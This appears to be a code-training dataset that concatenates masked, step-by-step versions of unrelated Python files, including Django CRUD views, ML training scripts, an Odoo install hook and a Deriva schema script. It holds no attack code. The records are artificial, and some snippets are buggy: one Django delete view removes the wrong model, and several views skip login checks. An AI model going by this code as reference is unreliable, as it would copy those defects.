"step-5": "from django.shortcuts import render, redirect\n\n\n# Create your views here.\nfrom item.models import Item, Unit\n\n\ndef str_to_bool(s):\n return True if s.lower() == 'true' else False\n\n\ndef item(request):\n if not request.session.get('is_login', None):\n return redirect('/item/item')\n else:\n item_list = Item.objects.all()\n return render(request, 'item/item.html', locals())\n\n\ndef add_item(request):\n if request.method == 'GET':\n last_item_info = Item.objects.last()\n unit_list=Unit.objects.all()\n return render(request, 'item/add_item.html', locals())\n else:\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n\n unit_info=Unit.objects.get(id=item_unit)\n new_item = Item(item_index=int(item_index), item_chinese_name=item_chinese_name,\n item_english_name=item_english_name,item_method=item_method,item_unit=unit_info,is_calc=str_to_bool(is_calc),\n is_use=str_to_bool(is_use))\n new_item.save()\n return redirect('/item/item/')\n\n\ndef edit_item(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n item_info = Item.objects.get(id=nid)\n unit_list = Unit.objects.all()\n return render(request, 'item/edit_item.html', locals())\n else:\n nid = request.GET.get('nid')\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n\n unit_info = Unit.objects.get(id=item_unit)\n item_info = Item.objects.get(id=nid)\n item_info.item_index = item_index\n item_info.item_chinese_name = item_chinese_name\n item_info.item_english_name = item_english_name\n item_info.item_method = item_method\n item_info.item_unit = unit_info\n item_info.is_calc = str_to_bool(is_calc)\n\n item_info.is_use = str_to_bool(is_use)\n item_info.save()\n return redirect('/item/item/')\n\n\ndef del_item(request):\n nid = request.GET.get('nid')\n item_info = Unit.objects.filter(id=nid)\n item_info.delete()\n return redirect('/item/item/')\n\n\ndef unit(request):\n if not request.session.get('is_login', None):\n return redirect('/item/unit')\n else:\n unit_list = Unit.objects.all()\n return render(request, 'item/unit.html', locals())\n\n\ndef add_unit(request):\n if request.method == 'GET':\n last_unit_info = Unit.objects.last()\n return render(request, 'item/add_unit.html', locals())\n else:\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name,)\n new_unit.save()\n return redirect('/item/unit/')\n\n\ndef edit_unit(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n unit_info = Unit.objects.get(id=nid)\n return render(request, 'item/edit_unit.html', locals())\n else:\n nid = request.GET.get('nid')\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n\n unit_info = Unit.objects.get(id=nid)\n unit_info.unit_index = unit_index\n unit_info.unit_name = unit_name\n\n unit_info.save()\n return redirect('/item/unit/')\n\n\ndef del_unit(request):\n nid = request.GET.get('nid')\n unit_info = Unit.objects.filter(id=nid)\n unit_info.delete()\n return redirect('/item/unit/')",
"step-ids": [
4,
5,
6,
8,
11
]
}
|
[
4,
5,
6,
8,
11
] |
from __future__ import division # floating point division
import csv
import random
import math
import numpy as np
import dataloader as dtl
import classalgorithms as algs
def getaccuracy(ytest, predictions):
correct = 0
for i in range(len(ytest)):
if ytest[i] == predictions[i]:
correct += 1
return (correct/float(len(ytest))) * 100.0
def geterror(ytest, predictions):
return (100.0-getaccuracy(ytest, predictions))
if __name__ == '__main__':
trainsize = 1000
testsize = 5000
numruns = 1
classalgs = {'Random': algs.Classifier(),
#'Naive Bayes': algs.NaiveBayes({'notusecolumnones': True}),
#'Naive Bayes Ones': algs.NaiveBayes({'notusecolumnones': False}),
#'Linear Regression': algs.LinearRegressionClass(),
#'Logistic Regression': algs.LogitReg(),
#'L1 Logistic Regression': algs.LogitReg({'regularizer': 'l1'}),
#'L2 Logistic Regression': algs.LogitReg({'regularizer': 'l2'}),
'Logistic Alternative': algs.LogitRegAlternative(),
#'Neural Network': algs.NeuralNet({'epochs': 100,'alpha':.01})
}
numalgs = len(classalgs)
parameters = (
#Regularization Weight, neural network height?
{'regwgt': 0.0, 'nh': 4},
#{'regwgt': 0.01, 'nh': 8},
#{'regwgt': 0.05, 'nh': 16},
#{'regwgt': 0.1, 'nh': 32},
)
numparams = len(parameters)
errors = {}
for learnername in classalgs:
errors[learnername] = np.zeros((numparams,numruns))
for r in range(numruns):
print ""
print "**********//////////////########### Run Number : ",(r+1),"###########\\\\\\\\\\\\\\\\\\\\\\\\\\\\*********"
print ""
##
##Fetching Data; Put Condition Which DataSet To Run
##
trainset, testset = dtl.load_susy(trainsize,testsize)
#trainset, testset = dtl.load_susy_complete(trainsize,testsize)
print('Running on train={0} and test={1} samples for run {2}').format(trainset[0].shape[0], testset[0].shape[0],r)
for p in range(numparams):
print ""
print "********** Parameter : ",(p+1),"**********"
print ""
params = parameters[p]
for learnername, learner in classalgs.iteritems():
# Reset learner for new parameters
learner.reset(params)
print "\n"
print 'Running learner = ' + learnername + ' on parameters ' + str(learner.getparams())
print ""
# Train model
learner.learn(trainset[0], trainset[1])
# Test model
predictions = learner.predict(testset[0])
error = geterror(testset[1], predictions)
print 'Error for ' + learnername + ': ' + str(error)
errors[learnername][p,r] = error
print ""
print "Some More Information : "
print ""
for learnername, learner in classalgs.iteritems():
besterror = np.mean(errors[learnername][0,:])
bestparams = 0
for p in range(numparams):
aveerror = np.mean(errors[learnername][p,:])
if aveerror < besterror:
besterror = aveerror
bestparams = p
# Extract best parameters
learner.reset(parameters[bestparams])
print 'Best parameters for ' + learnername + ': ' + str(learner.getparams())
print 'Average error for ' + learnername + ': ' + str(besterror) + ' +- ' + str(1.96*np.std(errors[learnername][bestparams,:])/math.sqrt(numruns))
|
normal
|
{
"blob_id": "c8ab53c77ff3646a30ca49eaafc275afeadd2ca6",
"index": 9545,
"step-1": "from __future__ import division # floating point division\nimport csv\nimport random\nimport math\nimport numpy as np\n\nimport dataloader as dtl\nimport classalgorithms as algs\n \n \ndef getaccuracy(ytest, predictions):\n correct = 0\n for i in range(len(ytest)):\n if ytest[i] == predictions[i]:\n correct += 1\n return (correct/float(len(ytest))) * 100.0\n\ndef geterror(ytest, predictions):\n return (100.0-getaccuracy(ytest, predictions))\n\n \nif __name__ == '__main__':\n trainsize = 1000\n testsize = 5000\n numruns = 1\n\n classalgs = {'Random': algs.Classifier(),\n #'Naive Bayes': algs.NaiveBayes({'notusecolumnones': True}),\n #'Naive Bayes Ones': algs.NaiveBayes({'notusecolumnones': False}),\n #'Linear Regression': algs.LinearRegressionClass(),\n #'Logistic Regression': algs.LogitReg(),\n #'L1 Logistic Regression': algs.LogitReg({'regularizer': 'l1'}),\n #'L2 Logistic Regression': algs.LogitReg({'regularizer': 'l2'}),\n 'Logistic Alternative': algs.LogitRegAlternative(), \n #'Neural Network': algs.NeuralNet({'epochs': 100,'alpha':.01})\n } \n numalgs = len(classalgs) \n\n parameters = (\n #Regularization Weight, neural network height?\n {'regwgt': 0.0, 'nh': 4},\n #{'regwgt': 0.01, 'nh': 8},\n #{'regwgt': 0.05, 'nh': 16},\n #{'regwgt': 0.1, 'nh': 32},\n )\n numparams = len(parameters) \n errors = {}\n for learnername in classalgs:\n errors[learnername] = np.zeros((numparams,numruns))\n \n for r in range(numruns):\n print \"\"\n print \"**********//////////////########### Run Number : \",(r+1),\"###########\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*********\"\n print \"\"\n ##\n ##Fetching Data; Put Condition Which DataSet To Run\n ##\n trainset, testset = dtl.load_susy(trainsize,testsize)\n #trainset, testset = dtl.load_susy_complete(trainsize,testsize)\n\n print('Running on train={0} and test={1} samples for run {2}').format(trainset[0].shape[0], testset[0].shape[0],r)\n\n for p in range(numparams):\n print \"\"\n print \"********** Parameter : \",(p+1),\"**********\"\n print \"\"\n params = parameters[p]\n for learnername, learner in classalgs.iteritems():\n # Reset learner for new parameters\n learner.reset(params)\n print \"\\n\"\n print 'Running learner = ' + learnername + ' on parameters ' + str(learner.getparams())\n print \"\"\n # Train model\n learner.learn(trainset[0], trainset[1])\n # Test model\n predictions = learner.predict(testset[0])\n error = geterror(testset[1], predictions)\n print 'Error for ' + learnername + ': ' + str(error)\n errors[learnername][p,r] = error\n\n\n\n print \"\"\n print \"Some More Information : \"\n print \"\"\n for learnername, learner in classalgs.iteritems():\n besterror = np.mean(errors[learnername][0,:])\n bestparams = 0\n for p in range(numparams):\n aveerror = np.mean(errors[learnername][p,:])\n if aveerror < besterror:\n besterror = aveerror\n bestparams = p\n\n # Extract best parameters \n learner.reset(parameters[bestparams])\n \tprint 'Best parameters for ' + learnername + ': ' + str(learner.getparams())\n \tprint 'Average error for ' + learnername + ': ' + str(besterror) + ' +- ' + str(1.96*np.std(errors[learnername][bestparams,:])/math.sqrt(numruns))\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
/Users/apple/anaconda/lib/python3.5/operator.py
|
normal
|
{
"blob_id": "b4a267873c5823ecfa62a5e90b67c37f9cca3cd2",
"index": 8181,
"step-1": "/Users/apple/anaconda/lib/python3.5/operator.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr
from . import models
from . import wizards
from odoo import api, SUPERUSER_ID
from odoo.addons.account.models.chart_template import preserve_existing_tags_on_taxes
def _preserve_tag_on_taxes(cr, registry):
preserve_existing_tags_on_taxes(cr, registry, 'l10n_lb')
env = api.Environment(cr, SUPERUSER_ID, {})
accounts = env['account.account'].search([('code', 'in', ['5301','5121','999999'])])
accounts.unlink()
journal_id = env['account.journal'].search([('name', '=', 'Cash'),('type', '=', 'cash')],limit=1)
if journal_id:
account = env['account.account'].search([('code', '=', '53000001')],limit=1)
journal_id.write({
'default_debit_account_id': account.id,
'default_credit_account_id': account.id
})
|
normal
|
{
"blob_id": "74b38599dd793282612a468a760f6301b9f039d6",
"index": 9878,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef _preserve_tag_on_taxes(cr, registry):\n preserve_existing_tags_on_taxes(cr, registry, 'l10n_lb')\n env = api.Environment(cr, SUPERUSER_ID, {})\n accounts = env['account.account'].search([('code', 'in', ['5301',\n '5121', '999999'])])\n accounts.unlink()\n journal_id = env['account.journal'].search([('name', '=', 'Cash'), (\n 'type', '=', 'cash')], limit=1)\n if journal_id:\n account = env['account.account'].search([('code', '=', '53000001')],\n limit=1)\n journal_id.write({'default_debit_account_id': account.id,\n 'default_credit_account_id': account.id})\n",
"step-3": "from . import models\nfrom . import wizards\nfrom odoo import api, SUPERUSER_ID\nfrom odoo.addons.account.models.chart_template import preserve_existing_tags_on_taxes\n\n\ndef _preserve_tag_on_taxes(cr, registry):\n preserve_existing_tags_on_taxes(cr, registry, 'l10n_lb')\n env = api.Environment(cr, SUPERUSER_ID, {})\n accounts = env['account.account'].search([('code', 'in', ['5301',\n '5121', '999999'])])\n accounts.unlink()\n journal_id = env['account.journal'].search([('name', '=', 'Cash'), (\n 'type', '=', 'cash')], limit=1)\n if journal_id:\n account = env['account.account'].search([('code', '=', '53000001')],\n limit=1)\n journal_id.write({'default_debit_account_id': account.id,\n 'default_credit_account_id': account.id})\n",
"step-4": "# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\n# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr\n\nfrom . import models\nfrom . import wizards\nfrom odoo import api, SUPERUSER_ID\nfrom odoo.addons.account.models.chart_template import preserve_existing_tags_on_taxes\n\ndef _preserve_tag_on_taxes(cr, registry):\n preserve_existing_tags_on_taxes(cr, registry, 'l10n_lb')\n env = api.Environment(cr, SUPERUSER_ID, {})\n accounts = env['account.account'].search([('code', 'in', ['5301','5121','999999'])])\n accounts.unlink()\n\n journal_id = env['account.journal'].search([('name', '=', 'Cash'),('type', '=', 'cash')],limit=1)\n if journal_id:\n account = env['account.account'].search([('code', '=', '53000001')],limit=1)\n journal_id.write({\n 'default_debit_account_id': account.id,\n 'default_credit_account_id': account.id\n })\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def summation(numbers):
positive_numbers = []
normalized_numbers = []
numbers_list = numbers.split()
for idx, arg in enumerate(numbers_list):
int_arg = int(arg)
if int_arg < 0:
new_arg = abs(int_arg) * 2
else:
new_arg = int_arg
positive_numbers.append(new_arg)
max_of_positive_numbers = max(positive_numbers)
for idx, arg in enumerate(positive_numbers):
normalized_arg = arg / max_of_positive_numbers
normalized_numbers.append(normalized_arg)
print(sum(normalized_numbers))
|
normal
|
{
"blob_id": "791df87235f5da634fc62ebc3a3741cea6e2deca",
"index": 3841,
"step-1": "<mask token>\n",
"step-2": "def summation(numbers):\n positive_numbers = []\n normalized_numbers = []\n numbers_list = numbers.split()\n for idx, arg in enumerate(numbers_list):\n int_arg = int(arg)\n if int_arg < 0:\n new_arg = abs(int_arg) * 2\n else:\n new_arg = int_arg\n positive_numbers.append(new_arg)\n max_of_positive_numbers = max(positive_numbers)\n for idx, arg in enumerate(positive_numbers):\n normalized_arg = arg / max_of_positive_numbers\n normalized_numbers.append(normalized_arg)\n print(sum(normalized_numbers))\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
n, x0, y0 = list(map(int, input().split()))
cards = [y0] + list(map(int, input().split()))
# yの手持ちはゲームに関与するため、リストに加えてしまう
xs = [[-1] * (n+1) for i in range(n+1)]
ys = [[-1] * (n+1) for i in range(n+1)]
#xs[i][j] = xの手番で、xがcards[i]を持ちyがcards[j]を持っているとき(i<j)の最善スコア
#ys[i][j] = yの手番で、xがcards[j]を持ちyがcards[i]を持っているとき(i<j)の最善スコア
for i in range(n+1):
xs[i][-1] = abs(cards[-1] - cards[i])
ys[i][-1] = abs(cards[-1] - cards[i])
for j in range(n-1, -1, -1):
# x[i][j] = max (y[j][j+1] , y[j][j+2] , ……, y[j][n] )
xs_temp = max(ys[j][j+1:n+1])
ys_temp = min(xs[j][j+1:n+1])
for i in range(0, j):
xs[i][j] = xs_temp
ys[i][j] = ys_temp
# print(xs)
# print(ys)
print(max(ys[0][1:]))
|
normal
|
{
"blob_id": "81b9fc78d92fdc4392cb71a77fdfd354ff950ae3",
"index": 6153,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(n + 1):\n xs[i][-1] = abs(cards[-1] - cards[i])\n ys[i][-1] = abs(cards[-1] - cards[i])\nfor j in range(n - 1, -1, -1):\n xs_temp = max(ys[j][j + 1:n + 1])\n ys_temp = min(xs[j][j + 1:n + 1])\n for i in range(0, j):\n xs[i][j] = xs_temp\n ys[i][j] = ys_temp\nprint(max(ys[0][1:]))\n",
"step-3": "n, x0, y0 = list(map(int, input().split()))\ncards = [y0] + list(map(int, input().split()))\nxs = [([-1] * (n + 1)) for i in range(n + 1)]\nys = [([-1] * (n + 1)) for i in range(n + 1)]\nfor i in range(n + 1):\n xs[i][-1] = abs(cards[-1] - cards[i])\n ys[i][-1] = abs(cards[-1] - cards[i])\nfor j in range(n - 1, -1, -1):\n xs_temp = max(ys[j][j + 1:n + 1])\n ys_temp = min(xs[j][j + 1:n + 1])\n for i in range(0, j):\n xs[i][j] = xs_temp\n ys[i][j] = ys_temp\nprint(max(ys[0][1:]))\n",
"step-4": "n, x0, y0 = list(map(int, input().split()))\n\ncards = [y0] + list(map(int, input().split()))\n# yの手持ちはゲームに関与するため、リストに加えてしまう\n\nxs = [[-1] * (n+1) for i in range(n+1)]\nys = [[-1] * (n+1) for i in range(n+1)] \n#xs[i][j] = xの手番で、xがcards[i]を持ちyがcards[j]を持っているとき(i<j)の最善スコア\n#ys[i][j] = yの手番で、xがcards[j]を持ちyがcards[i]を持っているとき(i<j)の最善スコア\n\nfor i in range(n+1):\n\txs[i][-1] = abs(cards[-1] - cards[i])\n\tys[i][-1] = abs(cards[-1] - cards[i])\n\nfor j in range(n-1, -1, -1):\n\n\t# x[i][j] = max (y[j][j+1] , y[j][j+2] , ……, y[j][n] )\n\txs_temp = max(ys[j][j+1:n+1])\n\tys_temp = min(xs[j][j+1:n+1])\n\tfor i in range(0, j):\n\t\txs[i][j] = xs_temp\n\t\tys[i][j] = ys_temp\n\n# print(xs)\n# print(ys)\nprint(max(ys[0][1:]))\t\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import heapq
from util import edit_distance
def autocomplete(suggest_tree, bktree, prefix, count=5):
"""Suggest top completions for a prefix given a SuggestTree and BKTree.
Completions for a given prefix are weighted primarily by their weight in the
suggest tree, and secondarily by their Levenshtein distance to words in the
BK-tree (where nearby words are weighted higher)."""
completion_weights = suggest_tree.completion_weights(prefix)
if completion_weights:
weight = lambda completion: completion_weights[completion]
proximity = lambda completion: completion_proximity_score(
prefix, completion)
selection_criteria = lambda completion: (
weight(completion), proximity(completion))
completions = completion_weights.keys()
return heapq.nlargest(count, completions, key=selection_criteria)
else:
matches = bktree.search(prefix)
proximity = lambda completion: edit_distance(prefix, completion)
return heapq.nsmallest(count, matches, key=proximity)
def completion_proximity_score(prefix, completion):
"""Calculate a score based on suffix length where a shorter length always
yields a higher score."""
if prefix == completion:
return float("inf")
else:
return 1.0 / float(len(completion))
|
normal
|
{
"blob_id": "24891cdefcd061f04e7b7768b1bde4e32b78adcc",
"index": 8690,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef completion_proximity_score(prefix, completion):\n \"\"\"Calculate a score based on suffix length where a shorter length always\n yields a higher score.\"\"\"\n if prefix == completion:\n return float('inf')\n else:\n return 1.0 / float(len(completion))\n",
"step-3": "<mask token>\n\n\ndef autocomplete(suggest_tree, bktree, prefix, count=5):\n \"\"\"Suggest top completions for a prefix given a SuggestTree and BKTree.\n \n Completions for a given prefix are weighted primarily by their weight in the \n suggest tree, and secondarily by their Levenshtein distance to words in the\n BK-tree (where nearby words are weighted higher).\"\"\"\n completion_weights = suggest_tree.completion_weights(prefix)\n if completion_weights:\n weight = lambda completion: completion_weights[completion]\n proximity = lambda completion: completion_proximity_score(prefix,\n completion)\n selection_criteria = lambda completion: (weight(completion),\n proximity(completion))\n completions = completion_weights.keys()\n return heapq.nlargest(count, completions, key=selection_criteria)\n else:\n matches = bktree.search(prefix)\n proximity = lambda completion: edit_distance(prefix, completion)\n return heapq.nsmallest(count, matches, key=proximity)\n\n\ndef completion_proximity_score(prefix, completion):\n \"\"\"Calculate a score based on suffix length where a shorter length always\n yields a higher score.\"\"\"\n if prefix == completion:\n return float('inf')\n else:\n return 1.0 / float(len(completion))\n",
"step-4": "import heapq\nfrom util import edit_distance\n\n\ndef autocomplete(suggest_tree, bktree, prefix, count=5):\n \"\"\"Suggest top completions for a prefix given a SuggestTree and BKTree.\n \n Completions for a given prefix are weighted primarily by their weight in the \n suggest tree, and secondarily by their Levenshtein distance to words in the\n BK-tree (where nearby words are weighted higher).\"\"\"\n completion_weights = suggest_tree.completion_weights(prefix)\n if completion_weights:\n weight = lambda completion: completion_weights[completion]\n proximity = lambda completion: completion_proximity_score(prefix,\n completion)\n selection_criteria = lambda completion: (weight(completion),\n proximity(completion))\n completions = completion_weights.keys()\n return heapq.nlargest(count, completions, key=selection_criteria)\n else:\n matches = bktree.search(prefix)\n proximity = lambda completion: edit_distance(prefix, completion)\n return heapq.nsmallest(count, matches, key=proximity)\n\n\ndef completion_proximity_score(prefix, completion):\n \"\"\"Calculate a score based on suffix length where a shorter length always\n yields a higher score.\"\"\"\n if prefix == completion:\n return float('inf')\n else:\n return 1.0 / float(len(completion))\n",
"step-5": "import heapq\nfrom util import edit_distance\n\n\ndef autocomplete(suggest_tree, bktree, prefix, count=5):\n \"\"\"Suggest top completions for a prefix given a SuggestTree and BKTree.\n \n Completions for a given prefix are weighted primarily by their weight in the \n suggest tree, and secondarily by their Levenshtein distance to words in the\n BK-tree (where nearby words are weighted higher).\"\"\"\n completion_weights = suggest_tree.completion_weights(prefix)\n if completion_weights:\n weight = lambda completion: completion_weights[completion]\n proximity = lambda completion: completion_proximity_score(\n prefix, completion)\n selection_criteria = lambda completion: (\n weight(completion), proximity(completion))\n completions = completion_weights.keys()\n return heapq.nlargest(count, completions, key=selection_criteria)\n else:\n matches = bktree.search(prefix)\n proximity = lambda completion: edit_distance(prefix, completion)\n return heapq.nsmallest(count, matches, key=proximity)\n\n \ndef completion_proximity_score(prefix, completion):\n \"\"\"Calculate a score based on suffix length where a shorter length always\n yields a higher score.\"\"\"\n if prefix == completion:\n return float(\"inf\")\n else:\n return 1.0 / float(len(completion))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# %%
import os
print(os.getcwd())
# %%
from TransformerModel.Model import Model
from dataset.DatasetLoader import DatasetLoader
import pytorch_lightning as pl
from pytorch_lightning.callbacks import EarlyStopping
import argparse
from argparse import ArgumentParser, ArgumentTypeError
# %%
def run_training(arguments_parser):
data = DatasetLoader(arguments_parser)
data.setup()
arguments_parser.num_training_steps = (
len(data.train_dataloader()) * arguments_parser.max_epochs
)
dict_args = vars(arguments_parser)
model = Model(**dict_args)
arguments_parser.early_stop_callback = EarlyStopping("val_loss")
trainer = pl.Trainer.from_argparse_args(arguments_parser)
trainer.fit(model, data)
# %%
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--pretrained", type=str, default="bert-base-uncased")
parser.add_argument("--nr_frozen_epochs", type=int, default=5)
parser.add_argument("--training_portion", type=float, default=0.9)
parser.add_argument("--batch_size", type=float, default=32)
parser.add_argument("--learning_rate", type=float, default=2e-5)
parser.add_argument("--frac", type=float, default=1)
parser = pl.Trainer.add_argparse_args(parser)
args = parser.parse_args()
run_training(args)
# %%
|
normal
|
{
"blob_id": "328a03acab2a0550bea0795d22110a152db6c503",
"index": 806,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef run_training(arguments_parser):\n data = DatasetLoader(arguments_parser)\n data.setup()\n arguments_parser.num_training_steps = len(data.train_dataloader()\n ) * arguments_parser.max_epochs\n dict_args = vars(arguments_parser)\n model = Model(**dict_args)\n arguments_parser.early_stop_callback = EarlyStopping('val_loss')\n trainer = pl.Trainer.from_argparse_args(arguments_parser)\n trainer.fit(model, data)\n\n\n<mask token>\n",
"step-3": "<mask token>\nprint(os.getcwd())\n<mask token>\n\n\ndef run_training(arguments_parser):\n data = DatasetLoader(arguments_parser)\n data.setup()\n arguments_parser.num_training_steps = len(data.train_dataloader()\n ) * arguments_parser.max_epochs\n dict_args = vars(arguments_parser)\n model = Model(**dict_args)\n arguments_parser.early_stop_callback = EarlyStopping('val_loss')\n trainer = pl.Trainer.from_argparse_args(arguments_parser)\n trainer.fit(model, data)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--pretrained', type=str, default='bert-base-uncased')\n parser.add_argument('--nr_frozen_epochs', type=int, default=5)\n parser.add_argument('--training_portion', type=float, default=0.9)\n parser.add_argument('--batch_size', type=float, default=32)\n parser.add_argument('--learning_rate', type=float, default=2e-05)\n parser.add_argument('--frac', type=float, default=1)\n parser = pl.Trainer.add_argparse_args(parser)\n args = parser.parse_args()\n run_training(args)\n",
"step-4": "import os\nprint(os.getcwd())\nfrom TransformerModel.Model import Model\nfrom dataset.DatasetLoader import DatasetLoader\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import EarlyStopping\nimport argparse\nfrom argparse import ArgumentParser, ArgumentTypeError\n\n\ndef run_training(arguments_parser):\n data = DatasetLoader(arguments_parser)\n data.setup()\n arguments_parser.num_training_steps = len(data.train_dataloader()\n ) * arguments_parser.max_epochs\n dict_args = vars(arguments_parser)\n model = Model(**dict_args)\n arguments_parser.early_stop_callback = EarlyStopping('val_loss')\n trainer = pl.Trainer.from_argparse_args(arguments_parser)\n trainer.fit(model, data)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--pretrained', type=str, default='bert-base-uncased')\n parser.add_argument('--nr_frozen_epochs', type=int, default=5)\n parser.add_argument('--training_portion', type=float, default=0.9)\n parser.add_argument('--batch_size', type=float, default=32)\n parser.add_argument('--learning_rate', type=float, default=2e-05)\n parser.add_argument('--frac', type=float, default=1)\n parser = pl.Trainer.add_argparse_args(parser)\n args = parser.parse_args()\n run_training(args)\n",
"step-5": "# %%\nimport os\n\nprint(os.getcwd())\n# %%\nfrom TransformerModel.Model import Model\nfrom dataset.DatasetLoader import DatasetLoader\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import EarlyStopping\nimport argparse\nfrom argparse import ArgumentParser, ArgumentTypeError\n\n# %%\n\n\ndef run_training(arguments_parser):\n data = DatasetLoader(arguments_parser)\n data.setup()\n\n arguments_parser.num_training_steps = (\n len(data.train_dataloader()) * arguments_parser.max_epochs\n )\n\n dict_args = vars(arguments_parser)\n\n model = Model(**dict_args)\n\n arguments_parser.early_stop_callback = EarlyStopping(\"val_loss\")\n\n trainer = pl.Trainer.from_argparse_args(arguments_parser)\n\n trainer.fit(model, data)\n\n\n# %%\nif __name__ == \"__main__\":\n\n parser = ArgumentParser()\n parser.add_argument(\"--pretrained\", type=str, default=\"bert-base-uncased\")\n parser.add_argument(\"--nr_frozen_epochs\", type=int, default=5)\n parser.add_argument(\"--training_portion\", type=float, default=0.9)\n parser.add_argument(\"--batch_size\", type=float, default=32)\n parser.add_argument(\"--learning_rate\", type=float, default=2e-5)\n parser.add_argument(\"--frac\", type=float, default=1)\n\n parser = pl.Trainer.add_argparse_args(parser)\n args = parser.parse_args()\n run_training(args)\n\n\n# %%\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
"""add_columns.py: This script reads an SCEC ETAS forecast directory name
and extracts key fields that are then added as attributes in the SCEC Deriva
schema.
This script is an example of how the ERD used by Deriva is extended as additional
information or metadata is added to the asset descriptions in Deriva.
This must be run after the create_model.py script has been run, because this modifies
the ERD created by that script.
The expectation is this is run once. If it is run a second time, we expect errors
indicating the columns already exist.
Philip Maechling
3 April 2021
"""
import os
import sys
from deriva.core import DerivaServer, ErmrestCatalog, get_credential
from deriva.chisel import Model, Schema, Table, Column, Key, ForeignKey, builtin_types, tag
if __name__ == "__main__":
# Connect to server and catalog ------------------------------------------------------------------#
hostname = 'forecast.derivacloud.org' # this is a dev server for throw-away work (change to 'forecast.derivacloud.org)
catalog_id = '5' # this was a throw-away catalog used to test this script (change to TBD)
model = Model.from_catalog(
DerivaServer('https', hostname, credentials=get_credential(hostname)).connect_ermrest(catalog_id)
)
#
# During testing, exit before any table modifications are done
#
tabname = model.schemas['ETAS'].tables["Forecast"]
print("Before Adding Column")
for column in tabname.column_definitions:
print(column.name,column.type.typename,column.nullok)
"""
Define a series of column names that reflect metadata we expect to extract from
the ETAS directory names. These are initial names, defined by developers.
ETAS modelers may want to rename these columns to be more meaningful to domain experts.
For this first version, all fields are defined as free text.
Redefinition of these values as controlled vocabularies are a future refinement.
1) Sim_Start_Time: Enumeration List
e.g: "2019_07_16"
not null
2) Catalog_Mag: Enumeration List
e.g.: "ComCatM7p1"
not null
3) Event_ID: Enumeration List
e.g.: "ci39457511"
not null
4) Post_Event_Date: Enumeration List
e.g.: "7DaysAfter"
maybe null
5) Rupture_Def: Enumeration List
e.g. "ShakeMapSurfaces"
"ShakeMapSurfaces-noSpont-full_td-scale1.14"
not null
"""
tabname.create_column(Column.define('Sim_Start_Time',
builtin_types.text,
comment="Simulation Start Time"))
tabname.create_column(Column.define('Catalog_Mag',
builtin_types.text,
comment="Catalog Name and Event Magnitude"))
tabname.create_column(Column.define('Event_ID',
builtin_types.text,
comment="Earthquake Event ID"))
tabname.create_column(Column.define('Post_Event_Date',
builtin_types.text,
comment="Days Forecast made after Mainshock"))
tabname.create_column(Column.define('Rupture_Definition',
builtin_types.text,
comment="Type of Rupture used in ETAS forecast"))
# retrieve catalog model again to ensure we reflect latest structural changes
# example shows this, but I'm not sure what it returns
print("After Adding Column")
etas_model = model.schemas['ETAS']
tabname = etas_model.tables["Forecast"]
for column in tabname.column_definitions:
print(column.name,column.type.typename,column.nullok)
sys.exit(0)
|
normal
|
{
"blob_id": "a745f72081e06ff3399f9d7f65a30d7eef594689",
"index": 2292,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n hostname = 'forecast.derivacloud.org'\n catalog_id = '5'\n model = Model.from_catalog(DerivaServer('https', hostname, credentials=\n get_credential(hostname)).connect_ermrest(catalog_id))\n tabname = model.schemas['ETAS'].tables['Forecast']\n print('Before Adding Column')\n for column in tabname.column_definitions:\n print(column.name, column.type.typename, column.nullok)\n \"\"\"\n Define a series of column names that reflect metadata we expect to extract from\n the ETAS directory names. These are initial names, defined by developers.\n ETAS modelers may want to rename these columns to be more meaningful to domain experts.\n For this first version, all fields are defined as free text.\n Redefinition of these values as controlled vocabularies are a future refinement.\n \n 1) Sim_Start_Time: Enumeration List\n e.g: \"2019_07_16\"\n not null\n \n 2) Catalog_Mag: Enumeration List\n e.g.: \"ComCatM7p1\"\n not null\n \n 3) Event_ID: Enumeration List\n e.g.: \"ci39457511\"\n not null\n \n 4) Post_Event_Date: Enumeration List\n e.g.: \"7DaysAfter\"\n maybe null\n \n 5) Rupture_Def: Enumeration List\n e.g. 